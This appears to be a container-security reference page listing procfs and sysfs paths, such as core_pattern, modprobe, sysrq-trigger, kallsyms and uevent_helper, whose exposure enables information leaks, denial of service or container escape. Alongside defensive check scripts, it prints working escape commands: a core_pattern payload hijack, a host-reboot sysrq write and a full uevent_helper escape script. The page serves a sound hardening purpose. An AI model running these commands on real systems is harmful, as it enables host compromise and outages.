Sensitive Mounts

Because /proc and /sys lack namespace support, exposing them to a container creates significant attack surface and information disclosure. Numerous files within procfs and sysfs carry a risk of container escape, host modification, or basic information disclosure that could facilitate other attacks.
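As a rough first check from inside a container, the sketch below reports whether a few of the paths discussed on this page are present and writable. The helper name mount_state is hypothetical, and a positive -w test only means the permission and mount flags allow writing; a MAC policy such as AppArmor may still deny the actual write.

```shell
#!/bin/sh
# Classify a path as "absent", "writable" or "read-only"
# from the point of view of the current process.
mount_state() {
    if [ ! -e "$1" ]; then
        echo absent
    elif [ -w "$1" ]; then
        echo writable
    else
        echo read-only
    fi
}

# Paths taken from this page; extend the list as needed.
for p in /proc/sys/kernel/core_pattern /proc/sys/kernel/modprobe \
         /proc/sysrq-trigger /sys/kernel/uevent_helper; do
    printf '%s: %s\n' "$p" "$(mount_state "$p")"
done
```

Any path reported as writable deserves a closer look at how the container was started.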

procfs

/proc/sys

/proc/sys typically grants access to modify kernel variables, which are usually controlled through sysctl(2).

/proc/sys/kernel/core_pattern

/proc/sys/kernel/core_pattern defines a program that is executed when a core file is generated (typically on a program crash). If the first character of this file is a pipe symbol |, the rest of the line is run as a program and the core file is passed to it on standard input. This program is run by the root user and accepts up to 128 bytes of command-line arguments. Given any crash and core-file generation, this allows trivial code execution on the container host (the core file itself can simply be discarded by the malicious program).

$ cd /proc/sys/kernel
$ echo "|$overlay/shell.sh" > core_pattern
$ sleep 5 && ./crash &
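To see whether a host already pipes core dumps to a program, the first character of the file can be inspected without writing anything. This is a minimal sketch; the function name core_pattern_is_piped is hypothetical.

```shell
#!/bin/sh
# Succeeds when the first character of the given core_pattern file is a pipe.
core_pattern_is_piped() {
    pattern=
    # read fails on a missing trailing newline but still fills the variable
    IFS= read -r pattern < "$1" || true
    case "$pattern" in
        '|'*) return 0 ;;
        *)    return 1 ;;
    esac
}

f=/proc/sys/kernel/core_pattern
if [ -r "$f" ] && core_pattern_is_piped "$f"; then
    echo "core dumps are piped to: $(cat "$f")"
fi
```

If the file is also writable from the container, the piped program can be replaced as shown above.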


/proc/sys/kernel/modprobe

/proc/sys/kernel/modprobe contains the path to the kernel module loader, which the kernel invokes when it needs to load a module on demand. Code execution can be gained by pointing this path at an attacker-controlled program and then performing any action that causes the kernel to attempt to load a module (such as using the crypto API to load a currently unloaded crypto module, or using ifconfig to load a networking module for a device not currently in use).

/proc/sys/vm/panic_on_oom

/proc/sys/vm/panic_on_oom is a global flag that determines whether the kernel panics when an Out of Memory (OOM) condition is hit, rather than invoking the OOM killer. This is more of a Denial of Service (DoS) attack than a container escape, but it nonetheless exposes a capability that should only be available to the host.
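The flag takes three values. The sketch below maps each to its meaning as described in the kernel's vm sysctl documentation; the function name describe_panic_on_oom is hypothetical, and the descriptions are paraphrased.

```shell
#!/bin/sh
# Translate a panic_on_oom value into a short description.
describe_panic_on_oom() {
    case "$1" in
        0) echo "OOM killer is invoked" ;;
        1) echo "panic, unless the OOM is confined by cpuset, mempolicy or memory cgroup limits" ;;
        2) echo "always panic" ;;
        *) echo "unknown value: $1" ;;
    esac
}

f=/proc/sys/vm/panic_on_oom
if [ -r "$f" ]; then
    describe_panic_on_oom "$(cat "$f")"
fi
```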

/proc/sys/fs

The /proc/sys/fs directory contains an array of options and information concerning various aspects of the file system, including quota, file handle, inode, and dentry information. Write access to this directory would allow various denial-of-service attacks against the host.

/proc/sys/fs/binfmt_misc

/proc/sys/fs/binfmt_misc allows executing miscellaneous binary formats, which typically means that interpreters can be registered for non-native binary formats (such as Java) based on their magic number. AppArmor rules typically leave this path writable. NCC is not aware of any exploits, but write access is unlikely to be required by most container applications.

/proc/config.gz

Depending on the CONFIG_IKCONFIG_PROC setting, /proc/config.gz exposes a compressed copy of the configuration options of the running kernel. This may allow a compromised or malicious container to easily discover and target vulnerable areas enabled in the kernel.
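Looking up a single option is enough to illustrate the disclosure. The sketch below assumes the usual kernel config layout, where an option appears either as CONFIG_X=value or as "# CONFIG_X is not set"; the function name kconfig_lookup is hypothetical.

```shell
#!/bin/sh
# Print the line for one option ($1) from a gzip-compressed kernel config ($2).
kconfig_lookup() {
    gzip -dc "$2" | grep -E "^(# )?$1[= ]"
}

if [ -r /proc/config.gz ]; then
    kconfig_lookup CONFIG_IKCONFIG_PROC /proc/config.gz
fi
```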

/proc/sysrq-trigger

SysRq is an old mechanism that can be invoked via a special SysRq keyboard combination. It allows an immediate reboot of the system, issuing sync(2), remounting all filesystems read-only, invoking kernel debuggers, and other operations.

If the guest is not properly isolated, it can trigger SysRq commands by writing characters to the /proc/sysrq-trigger file.

# Reboot the host
echo b > /proc/sysrq-trigger

/proc/kmsg

/proc/kmsg exposes kernel ring buffer messages, typically accessed via dmesg. Exposure of this information can aid kernel exploits, leak kernel addresses (which could help defeat kernel Address Space Layout Randomization (KASLR)), and serve as a source of general information disclosure about the kernel, hardware, blocked packets, and other system details.

/proc/kallsyms

/proc/kallsyms contains a list of exported kernel symbols and their addresses, for the kernel itself and for loadable modules. This reveals where the kernel image is located in memory, which is helpful for kernel exploit development. From these locations, the base address or offset of the kernel can be determined, which can be used to overcome kernel Address Space Layout Randomization (KASLR).

On systems with kptr_restrict set to 1 or 2, this file still exists but does not provide any address information (although the order in which the symbols are listed is identical to their order in memory).
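Whether addresses are actually exposed to the current process can be checked by looking for any non-zero value in the first column. This is a minimal sketch that assumes hidden addresses are printed as all zeros; the function name kallsyms_exposes_addresses is hypothetical.

```shell
#!/bin/sh
# Succeeds when at least one symbol in the given file has a non-zero address.
kallsyms_exposes_addresses() {
    awk '$1 !~ /^0+$/ { found = 1; exit } END { exit !found }' "$1"
}

if [ -r /proc/kallsyms ]; then
    if kallsyms_exposes_addresses /proc/kallsyms; then
        echo "kernel addresses are visible"
    else
        echo "kernel addresses are hidden"
    fi
fi
```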

/proc/[pid]/mem

/proc/[pid]/mem exposes the memory of the given process through the kernel's memory access interfaces. While the PID namespace may protect against some attacks via this procfs vector, this area has historically been vulnerable, then thought safe, and then again found to be vulnerable to privilege escalation.

/proc/kcore

/proc/kcore represents the physical memory of the system in ELF core format (the format typically found in core dump files). It does not allow writing to that memory. The ability to read this file (restricted to privileged users) can leak memory contents from the host system and other containers.

The large reported file size represents the maximum amount of physically addressable memory for the architecture, and can cause problems when the file is read (or crashes, depending on the fragility of the software).

Dumping /proc/kcore in 2019

/proc/kmem

/proc/kmem is an alternate interface for /dev/kmem (direct access to which is blocked by the cgroup device whitelist), a character device file representing kernel virtual memory. It allows both reading and writing, and therefore direct modification of kernel memory.

/proc/mem

/proc/mem is an alternate interface for /dev/mem (direct access to which is blocked by the cgroup device whitelist), a character device file representing the physical memory of the system. It allows both reading and writing, and therefore modification of all memory. (It requires slightly more finesse than kmem, as virtual addresses need to be resolved to physical addresses first.)

/proc/sched_debug

/proc/sched_debug is a special file that returns process scheduling information for the entire system. This information includes process names and process IDs from all namespaces, in addition to process cgroup identifiers. This effectively bypasses the PID namespace protections, and because the file is world-readable it can be exploited in unprivileged containers as well.

/proc/[pid]/mountinfo

/proc/[pid]/mountinfo contains information about mount points in the process's mount namespace. It exposes the location of the container rootfs or image on the host.
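For containers backed by OverlayFS, the host-side location typically shows up in the upperdir= mount option. The sketch below extracts it from a mountinfo file; the function name overlay_upperdir is hypothetical, and the approach assumes an overlay root filesystem (other storage drivers expose different options).

```shell
#!/bin/sh
# Print the upperdir option of every overlay mount listed in the given mountinfo file.
overlay_upperdir() {
    sed -n 's/.* - overlay .*[,[:space:]]upperdir=\([^,]*\).*/\1/p' "$1"
}

# Prints nothing when the current mount namespace has no overlay mounts.
overlay_upperdir /proc/self/mountinfo
```

The printed directory is a path on the host, which is what payload-based escapes need in order to reference files created inside the container.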

sysfs

/sys/kernel/uevent_helper

uevents are events triggered by the kernel when a device is added or removed. Notably, the path of the uevent_helper can be modified by writing to /sys/kernel/uevent_helper. Then, when a uevent is triggered (which can also be done from userland by writing to files such as /sys/class/mem/null/uevent), the malicious uevent_helper is executed.

# Finds the host path of the container's OverlayFS mount
# (unless the configuration explicitly exposes the mount point of the host filesystem)
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
# Creates a payload; it runs on the host, so it writes its output under $host_path
echo '#!/bin/sh' > /evil-helper
echo "ps > $host_path/output" >> /evil-helper
chmod +x /evil-helper
# Sets uevent_helper to the host-side path of the payload
echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
# Triggers a uevent
echo change > /sys/class/mem/null/uevent
# or else
# echo /sbin/poweroff > /sys/kernel/uevent_helper
# Reads the output
cat /output

/sys/class/thermal

/sys/class/thermal gives access to ACPI and various hardware settings for temperature control, typically found in laptops or gaming motherboards. This may allow DoS attacks against the container host, which may even lead to physical damage.

/sys/kernel/vmcoreinfo

This file can leak kernel addresses, which could be used to defeat KASLR.

/sys/kernel/security

/sys/kernel/security is where the securityfs interface is mounted, which allows configuration of Linux Security Modules. This includes configuration of AppArmor policies, so access to it may allow a container to disable its MAC system.

/sys/firmware/efi/vars

/sys/firmware/efi/vars exposes interfaces for interacting with EFI variables in NVRAM. While this is not typically relevant for most servers, EFI is becoming more and more popular. Permission weaknesses have even led to some bricked laptops.

/sys/firmware/efi/efivars

/sys/firmware/efi/efivars provides an interface for writing to the NVRAM used for UEFI boot arguments. Modifying them can render the host machine unbootable.

/sys/kernel/debug

debugfs provides a "no rules" interface through which the kernel (or kernel modules) can create debugging interfaces accessible to userland. It has had a number of security issues in the past, and the "no rules" guidelines behind the filesystem have often clashed with security constraints.
